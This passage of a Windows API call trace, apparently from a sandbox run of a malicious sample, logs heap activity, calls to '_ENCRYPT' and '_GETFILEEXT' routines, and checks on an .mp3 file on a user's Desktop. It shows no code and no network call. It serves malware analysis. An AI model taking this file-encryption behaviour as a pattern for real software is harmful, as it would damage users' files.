hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0165.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0165.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0165.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0165.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0165.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0165.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0165.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0165.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0165.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0165.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0165.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0165.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0165.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0165.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0165.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0165.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0165.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0165.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0165.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0165.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0165.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0165.053] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0165.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0165.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0165.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0165.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0165.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0165.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0165.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0165.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0165.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0165.054] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0165.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0165.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0165.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0165.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0165.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0165.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0165.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0165.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0165.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0165.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0165.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0165.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0165.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0165.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0165.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0165.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0165.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0165.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0165.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0165.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0165.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0165.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0165.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0165.055] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0165.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0165.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0165.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0165.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0165.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0165.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0165.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0165.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0165.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0165.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0165.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0165.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0165.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0165.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0165.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0165.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0165.056] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0165.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0165.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0165.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0165.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9a90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0165.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0165.057] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0165.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0165.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0165.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0165.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0165.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0165.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0165.057] CloseHandle (hObject=0x138) returned 1 [0165.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0165.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0165.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0165.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0165.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0165.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0165.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0165.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0165.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0165.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0165.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0165.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0165.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0165.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0165.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0165.058] FreeLibrary (hLibModule=0x75990000) returned 1 [0165.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0165.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0165.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0165.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0165.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0165.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0165.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0165.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0165.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0165.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0165.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0165.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0165.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0165.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0165.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0165.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0165.059] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0165.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0165.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0165.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0165.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0165.059] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0165.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0165.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0165.060] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0165.060] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0165.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0165.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0165.060] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0165.060] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0165.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0165.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0165.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0165.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0165.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0165.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0165.060] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0165.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0165.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0165.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0165.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0165.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0165.061] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0165.061] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0165.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0165.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0165.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0165.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0165.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0165.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0165.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0165.061] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28da0830, ftCreationTime.dwHighDateTime=0x1d5dc11, ftLastAccessTime.dwLowDateTime=0x8d38b190, ftLastAccessTime.dwHighDateTime=0x1d5e405, ftLastWriteTime.dwLowDateTime=0x8d38b190, ftLastWriteTime.dwHighDateTime=0x1d5e405, nFileSizeHigh=0x0, nFileSizeLow=0xda2c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="oB O9kLZ7MPDb_Fa.mp3", cAlternateFileName="OBO9KL~1.MP3")) returned 0x90add8 [0165.063] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0165.063] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0165.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0165.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0165.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0165.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0165.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0165.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0165.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0165.063] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28da0830, ftCreationTime.dwHighDateTime=0x1d5dc11, ftLastAccessTime.dwLowDateTime=0x8d38b190, ftLastAccessTime.dwHighDateTime=0x1d5e405, ftLastWriteTime.dwLowDateTime=0x8d38b190, ftLastWriteTime.dwHighDateTime=0x1d5e405, nFileSizeHigh=0x0, nFileSizeLow=0xda2c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="oB O9kLZ7MPDb_Fa.mp3", cAlternateFileName="OBO9KL~1.MP3")) returned 0x90add8 [0165.064] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0165.064] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0165.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0165.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0165.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", 